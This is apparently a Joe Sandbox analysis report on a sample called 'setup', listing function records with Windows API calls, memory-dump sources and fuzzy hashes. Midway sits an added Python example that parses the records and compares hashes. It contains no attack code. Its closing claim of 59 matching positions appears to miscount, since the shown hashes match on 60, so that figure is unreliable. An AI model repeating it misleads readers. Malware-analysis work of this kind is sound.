                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: FileTime$DatePointer_strcat
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2362003032-0
                                                                                                                          • Opcode ID: 17ec5278e914357a40ebdd381d261afdc41ece6fb388353e9258afd2f11dcc3e
                                                                                                                          • Instruction ID: 3d0c5940475ed077557f3dae6a6531b4b090e96923f89aec205da6c1834ca6c5
                                                                                                                          • Opcode Fuzzy Hash: 17ec5278e914357a40ebdd381d261afdc41ece6fb388353e9258afd2f11dcc3e
                                                                                                                          • Instruction Fuzzy Hash: CCB180719046288FCB29DF29D8827D9BBF4BF49300F1445AED1AD97681DB30AE91DF90
                                                                                                                          APIs
                                                                                                                          • GetSystemInfo.KERNEL32(?,74E2F860,00000000), ref: 00C1F247
                                                                                                                          • VirtualQuery.KERNEL32(00000000,?,0000001C,00000000), ref: 00C1F27C
                                                                                                                            • Part of subcall function 00C1EEE0: GetModuleFileNameW.KERNEL32(?,?,0000040E,?,00C1F2B2,00000001), ref: 00C1EF52
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: FileInfoModuleNameQuerySystemVirtual
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2607647841-0
                                                                                                                          • Opcode ID: bbbf6bba121529eb9c2c5c85b3a0bdb9b97d3e17c1e1fe165af505566ed8a8a5
                                                                                                                          • Instruction ID: 242eef4009ec9d9e58b6410b0f6b591221e4da41d81fa5156b02741bea8a38ba
                                                                                                                          • Opcode Fuzzy Hash: bbbf6bba121529eb9c2c5c85b3a0bdb9b97d3e17c1e1fe165af505566ed8a8a5
                                                                                                                          • Instruction Fuzzy Hash: 01115175E0011A9BDF10DB95C855BDEBBB9BF89350F14406AE820F7244D774DE82DB90
                                                                                                                          APIs
                                                                                                                          • GetSystemTimeAsFileTime.KERNEL32(?,?,00000000,?,?,?,00C15E54,00000000,?,00000000), ref: 00C789F3
                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00C78A12
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Time$FileSystemUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1518329722-0
                                                                                                                          • Opcode ID: 52eafa48edcf9aa7f419b7d2bfb0cefaf7c6d864b6288efe49acc3315af2747b
                                                                                                                          • Instruction ID: 528df16256981d32ed68a6a172546e33628c37d0464abdeece4ebce4675bf35a
                                                                                                                          • Opcode Fuzzy Hash: 52eafa48edcf9aa7f419b7d2bfb0cefaf7c6d864b6288efe49acc3315af2747b
                                                                                                                          • Instruction Fuzzy Hash: 15F0F4B1A102147B8B348F6DC808D9EBEE9EBC47B0729C65AE91ED3340E970DE019290
                                                                                                                          APIs
                                                                                                                          • GetTimeZoneInformation.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00C87D55,00000000,00000000,00000000), ref: 00C87C14
Memory Dump Source
• Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
• Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c00000_setup.jbxd
Similarity
• API ID: InformationTimeZone
• String ID:
• API String ID: 565725191-0
• Opcode ID: 209534fc2d737fe7e368c4156aedeea879d6886d1ed647900040593748a09223
• Instruction ID: dcbcd5a47d74130a1308344856cffe824f36c0ac24163bd249773834aaa90750
• Opcode Fuzzy Hash: 209534fc2d737fe7e368c4156aedeea879d6886d1ed647900040593748a09223
• Instruction Fuzzy Hash: 65C14572904111ABCB14BF65DC42BBE7BB9EF40758F244216F915AB290FB30CE41EB98
APIs
• RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00C81523,?,?,00000008,?,?,00C910E5,00000000), ref: 00C81755
Similarity
• API ID: ExceptionRaise
• String ID:
• API String ID: 3997070919-0
• Opcode ID: e1219ecc4554e22e2ef12096a46fc9603afb5f7f11999aa0b2dcf27c01361cf3
• Instruction ID: 9b4fdb51da15bf9699e9a65e1adafc505a4db55dd53804b1dad8e012f9fd4b8d
• Opcode Fuzzy Hash: e1219ecc4554e22e2ef12096a46fc9603afb5f7f11999aa0b2dcf27c01361cf3
• Instruction Fuzzy Hash: 36B129316106089FD715DF28C48AB657BE4FF45369F298658ECEACF2A1C335DA82CB44
APIs
• IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00C47D95
Similarity
• API ID: FeaturePresentProcessor
• String ID:
• API String ID: 2325560087-0
• Opcode ID: 825ee73f75848f179ea9d8c29c45b352fc63e0e51137605bc165a3fe681b9f5b
• Instruction ID: 7529d41c4f56420dabc35a13c1626b29337ba88f1be8cb1d6a93b2b03e3f706a
• Opcode Fuzzy Hash: 825ee73f75848f179ea9d8c29c45b352fc63e0e51137605bc165a3fe681b9f5b
• Instruction Fuzzy Hash: 77A15BB29106058FDB28CF98DC857AEBBB1FB48324F14866ED415E73A0D3349A59CF50
Strings
Similarity
• API ID:
• String ID: 0
• API String ID: 0-4108050209
• Opcode ID: b09913e47784b7e912730f9a760cba0072efd859e2710228de30bf254128296b
• Instruction ID: c2667bd8a1f08df8430ccee689b658010e60dbfaf7d556b8c2925a3e2147de8f
• Opcode Fuzzy Hash: b09913e47784b7e912730f9a760cba0072efd859e2710228de30bf254128296b
• Instruction Fuzzy Hash: DCD1D134A04A0A8FCB24CF69C594A7EBBB1FF49310B24C65DE56E9B790D731AE41CB50
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 8296ee0c89d059c093f1d45e54ca1104706ee4895c7e1420481e526f8f5f8fea
• Instruction ID: 97b50b5aed54361323565c25a841c669d57a86728dcd88552fd3b6e67c18c289
• Opcode Fuzzy Hash: 8296ee0c89d059c093f1d45e54ca1104706ee4895c7e1420481e526f8f5f8fea
• Instruction Fuzzy Hash: CE31E47290021DAFCB20EFB8CC88DBFB76DEB84318F548159F81597244EE30AE449B64
Strings
Similarity
• API ID:
• String ID: 0
• API String ID: 0-4108050209
• Opcode ID: 05d0ba20089bead21e6eaed2a20062f9d695d4eaff3520e8122fe539843d1d1b
• Instruction ID: b0611a8dd50f667933d4fa27ca5aab17548095690efdd085bcda444e9c0b9100
• Opcode Fuzzy Hash: 05d0ba20089bead21e6eaed2a20062f9d695d4eaff3520e8122fe539843d1d1b
• Instruction Fuzzy Hash: 49C1DF70A00E0A8FCB35CF68C5856BABBB1FF16310F14C619D4AAD7691C731AE45EB51
Strings
Similarity
• API ID:
• String ID: 0
• API String ID: 0-4108050209
• Opcode ID: b668ae7155efc81e270b9f89252020a24907cb6f0213a117585e2defc6248d7e
• Instruction ID: a2fbc4ca85759b27a651b025fb47728fa361f6adfb41d81c7569dc316de2fa4c
• Opcode Fuzzy Hash: b668ae7155efc81e270b9f89252020a24907cb6f0213a117585e2defc6248d7e
• Instruction Fuzzy Hash: FFB1E130904E0A8BCB28CE69C9556BEBBB1AF00314F14C61DD5AEA7691DB30AF41DB52
APIs
• SetLastError.KERNEL32(0000000E,00000000,00000000,00000000,?,?,00C26722,?,00CC0B54,?,00000000,00000000,00000000), ref: 00C27CFE
Similarity
• API ID: ErrorLast
• String ID:
• API String ID: 1452528299-0
• Opcode ID: c074212ee9f63b81f627ab1e37deb13768bad33d9c92df6e2ca8880d0a4d0276
• Instruction ID: 140a92563f485d19ee8d2877c2bb55a454adb09b7cf5752f9e3d5296cd481ba4
• Opcode Fuzzy Hash: c074212ee9f63b81f627ab1e37deb13768bad33d9c92df6e2ca8880d0a4d0276
• Instruction Fuzzy Hash: 8FB15C75A08226CBCF24DF69D4D02BAB7F1FF54300F25866ED86997A40E7748E81CB90
APIs
Similarity
• API ID: Iconic
• String ID:
• API String ID: 110040809-0
• Opcode ID: ab4e74181a523a7b97534f8ce092d06b3007731950ecf0cc1bf3f9fdb0d7fb65
• Instruction ID: 48f05e4ec5f135fab02971ed73d7bdd423108adc2fae10188bd383827d169d65
• Opcode Fuzzy Hash: ab4e74181a523a7b97534f8ce092d06b3007731950ecf0cc1bf3f9fdb0d7fb65
• Instruction Fuzzy Hash: A7D01231520760DBC7355F15D8087D673A4BB08355F04042EC08645474E7A09C81D740
APIs
• SetUnhandledExceptionFilter.KERNEL32(Function_00047CC9,00C46E73), ref: 00C47CC2
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ExceptionFilterUnhandled
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3192549508-0
                                                                                                                          • Opcode ID: 845b42fff3c7e8a6664e4e231a8810ca25bb2380499d4a644efdcba612f9ed02
                                                                                                                          • Instruction ID: 0860aefb24af16c2b97aa801aa04d8257718d3adf7973c4b61003a56adb19065
                                                                                                                          • Opcode Fuzzy Hash: 845b42fff3c7e8a6664e4e231a8810ca25bb2380499d4a644efdcba612f9ed02
                                                                                                                          • Instruction Fuzzy Hash:
APIs
Memory Dump Source
• Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
• Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c00000_setup.jbxd
Similarity
• API ID: HeapProcess
• String ID:
• API String ID: 54951025-0
• Opcode ID: 786b92875e9f09884d65cac7a14062f24257a316ef1036c2cdbd38e0f18906ef
• Instruction ID: 8587126801f01a6f575d8f1978a378535b31d8d7231bafefb46dc1865f6cf8d7
• Opcode Fuzzy Hash: 786b92875e9f09884d65cac7a14062f24257a316ef1036c2cdbd38e0f18906ef
• Instruction Fuzzy Hash: F9A001706026428BA7488F76AA19B0D3AA9BA496D1705C0AAA815C61B4EA2884509F01

Memory Dump Source
• Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
• Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c00000_setup.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: c88309053c73262699064bfa38773ea9045e316670bf343580be28a4a81fcd82
• Instruction ID: ea5a0b69f8cb457005f8cccd33c59fff967b3e796a106dced12c1a1482e9af23
• Opcode Fuzzy Hash: c88309053c73262699064bfa38773ea9045e316670bf343580be28a4a81fcd82
• Instruction Fuzzy Hash: A672E4B5E00219DFCF08CFA9D9946ADBBF1FF48310F24816AD815AB785D734AA51CB90

Memory Dump Source
• Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
• Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c00000_setup.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 40c9845c14dd1eb1f4aa8cb25b34474860d736eb701fa891d5f43fdf15719fd4
• Instruction ID: 626457a1e6d66db14e576b5b6420a545c1ef27e5ef6cda00d0aaf423ce1920ed
• Opcode Fuzzy Hash: 40c9845c14dd1eb1f4aa8cb25b34474860d736eb701fa891d5f43fdf15719fd4
• Instruction Fuzzy Hash: 76324A61D25F814DD723A634C8223396248AFB77CCF55D737F826B6AA5EB29C6C34204

Memory Dump Source
• Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
• Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c00000_setup.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: a8457387be306a78de57fb0680277b7addeb9b011a81914b522fec4b659a32d9
• Instruction ID: d215900f5767023c3a801efa661b295230122352208a2dbfec8086f6e946e373
• Opcode Fuzzy Hash: a8457387be306a78de57fb0680277b7addeb9b011a81914b522fec4b659a32d9
• Instruction Fuzzy Hash: C3320721D29F414DD7239634DC2233A6649AFB73C9F15D737E82AB69A6EB38C5C35200

Memory Dump Source
• Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
• Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c00000_setup.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: b1a12b9c14a13eca61038ba204e81bec93b3211fd4acf73c529837180d0bcc7d
• Instruction ID: 6acfb19ebdbf1201e20aa30d5159bb9bcca70c5c3302557a89a73aa9c4cc76c9
• Opcode Fuzzy Hash: b1a12b9c14a13eca61038ba204e81bec93b3211fd4acf73c529837180d0bcc7d
• Instruction Fuzzy Hash: 6B022E76E012199BDF14CFA9C8846AEFBF5FF48314F2482A9D519E7340D731AA41CB94

Memory Dump Source
• Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
• Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c00000_setup.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d6392f95b0deb928ec42c86aef0b949bc6bdcf2860ded11debb9db6c547a7e91
• Instruction ID: afa4e56401681755e535eae1b8089d0065e04a037d8935ae07aa2a303d4a626f
• Opcode Fuzzy Hash: d6392f95b0deb928ec42c86aef0b949bc6bdcf2860ded11debb9db6c547a7e91
• Instruction Fuzzy Hash: 2212F6B1E00219DFCF08CF99D994AADBBB1FF48310F24816AD815AB785D734EA51CB94

Memory Dump Source
• Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
• Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c00000_setup.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: f36ec5cca39c44363e6a4929fc44773dbccd9c00c253e9200101c1376e5e423d
• Instruction ID: 490c78598dcf5bd65ff080f4e8b99c7fd407ef6a00dedb51fde28fa9ff44015d
• Opcode Fuzzy Hash: f36ec5cca39c44363e6a4929fc44773dbccd9c00c253e9200101c1376e5e423d
• Instruction Fuzzy Hash: 1CC13571E022098FDF60DFA9C9C16FEB7B5BF54310F044129E915A7221EB75AE01ABA1

Memory Dump Source
• Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
• Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c00000_setup.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 2ca14a1321d441743eece5f908a5f80dfddcce28c4c92d1da0303260934506b3
• Instruction ID: acafe67b8d082828e0267aa68173d891526757c6897eaa9ff5b03f34555154e6
• Opcode Fuzzy Hash: 2ca14a1321d441743eece5f908a5f80dfddcce28c4c92d1da0303260934506b3
• Instruction Fuzzy Hash: 10E1F772E1060A9FDF04CFA9D891AEDBBF2AF88310F248569D555F7384D630AA45CB50

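Each function record above closes with a "Similarity" block whose Opcode Fuzzy Hash and Instruction Fuzzy Hash exist to be compared across functions and across samples, and one record (API ID ExceptionFilterUnhandled) leaves its Instruction Fuzzy Hash blank. The Python below is an added example and not part of the Joe Sandbox report or its tooling: it parses this record layout from the plain-text listing, pulls out the API calls (here the SetUnhandledExceptionFilter reference at 00C47CC2) and flags pairs of records whose Instruction Fuzzy Hashes agree on most hex positions. Assumptions: SAMPLE is constructed from four records on this page, trimmed to the fields the code uses; hash_similarity() is a positional nibble-match fraction chosen for illustration, since the report does not document its own scoring; a blank or length-mismatched hash scores 0 instead of raising.

```python
"""Parse the per-function records listed in this Joe Sandbox report and flag
functions whose Instruction Fuzzy Hashes nearly coincide.

Added example, not part of the report. SAMPLE is constructed from four records
on this page, trimmed to the fields used below. hash_similarity() is an assumed
positional metric for illustration, not Joe Sandbox's own scoring.
"""
import re
from itertools import combinations

SAMPLE = """\
APIs
• SetUnhandledExceptionFilter.KERNEL32(Function_00047CC9,00C46E73), ref: 00C47CC2
Memory Dump Source
• Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c00000_setup.jbxd
Similarity
• API ID: ExceptionFilterUnhandled
• API String ID: 3192549508-0
• Opcode ID: 845b42fff3c7e8a6664e4e231a8810ca25bb2380499d4a644efdcba612f9ed02
• Instruction Fuzzy Hash:
Memory Dump Source
• Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c00000_setup.jbxd
Similarity
• Opcode ID: c88309053c73262699064bfa38773ea9045e316670bf343580be28a4a81fcd82
• Instruction Fuzzy Hash: A672E4B5E00219DFCF08CFA9D9946ADBBF1FF48310F24816AD815AB785D734AA51CB90
Memory Dump Source
• Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c00000_setup.jbxd
Similarity
• Opcode ID: d6392f95b0deb928ec42c86aef0b949bc6bdcf2860ded11debb9db6c547a7e91
• Instruction Fuzzy Hash: 2212F6B1E00219DFCF08CF99D994AADBBB1FF48310F24816AD815AB785D734EA51CB94
Memory Dump Source
• Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c00000_setup.jbxd
Similarity
• Opcode ID: 40c9845c14dd1eb1f4aa8cb25b34474860d736eb701fa891d5f43fdf15719fd4
• Instruction Fuzzy Hash: 76324A61D25F814DD723A634C8223396248AFB77CCF55D737F826B6AA5EB29C6C34204
"""

SECTIONS = {"APIs", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
# e.g. "SetUnhandledExceptionFilter.KERNEL32(Function_00047CC9,00C46E73), ref: 00C47CC2"
API_RE = re.compile(r"^(?P<name>\w+)\.(?P<module>\w+)\((?P<args>.*)\), ref: (?P<ref>[0-9A-Fa-f]+)$")
FIELD_RE = re.compile(r"^(?P<key>[^:]+):\s*(?P<value>.*)$")


def parse_records(text):
    """One dict per function. A record opens with "APIs" (if the function
    calls any) or with "Memory Dump Source"; the latter seen after a record's
    "Similarity" block therefore starts the next record."""
    records, cur, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()          # drop the bullet glyph
        if not line:
            continue
        if line in SECTIONS:
            if cur and (line == "APIs" or (line == "Memory Dump Source" and "Similarity" in cur["sections"])):
                records.append(cur)
                cur = None
            cur = cur or {"apis": [], "fields": {}, "sections": set()}
            cur["sections"].add(line)
            section = line
        elif cur and section == "APIs" and (m := API_RE.match(line)):
            cur["apis"].append(m.groupdict())           # name, module, args, ref
        elif cur and (m := FIELD_RE.match(line)):
            cur["fields"][m["key"]] = m["value"]        # blank values are kept as ""
    return records + [cur] if cur else records


def hash_similarity(a, b):
    """Fraction of hex positions on which two equal-length hashes agree.
    Assumed metric for illustration. A blank hash (the report leaves some
    Instruction Fuzzy Hash fields empty) or a length mismatch scores 0.0."""
    if not a or not b or len(a) != len(b):
        return 0.0
    return sum(x == y for x, y in zip(a.upper(), b.upper())) / len(a)


def near_duplicates(records, threshold=0.8):
    """(Opcode ID a, Opcode ID b, score) for record pairs at or above threshold."""
    pairs = []
    for ra, rb in combinations(records, 2):
        score = hash_similarity(ra["fields"].get("Instruction Fuzzy Hash", ""),
                                rb["fields"].get("Instruction Fuzzy Hash", ""))
        if score >= threshold:
            pairs.append((ra["fields"].get("Opcode ID", ""), rb["fields"].get("Opcode ID", ""), score))
    return pairs


if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    print(len(recs), "records;", [(a["name"], a["ref"]) for r in recs for a in r["apis"]])
    print(near_duplicates(recs))
```

Run as a script it prints the four parsed records, the single API reference, and the one pair that clears the 0.8 threshold: the records with Opcode IDs c88309053c73… and d6392f95b0de…, whose Instruction Fuzzy Hashes agree on 59 of 70 positions. The record with the blank hash is skipped rather than scored, which is the failure mode to handle when batch-comparing these listings across reports.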
Memory Dump Source
• Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
• Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c00000_setup.jbxd
Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 21889302f5840bb7ab53128212c91d3311c6d7f0053f2b3a8f94f3b4a8a5437f
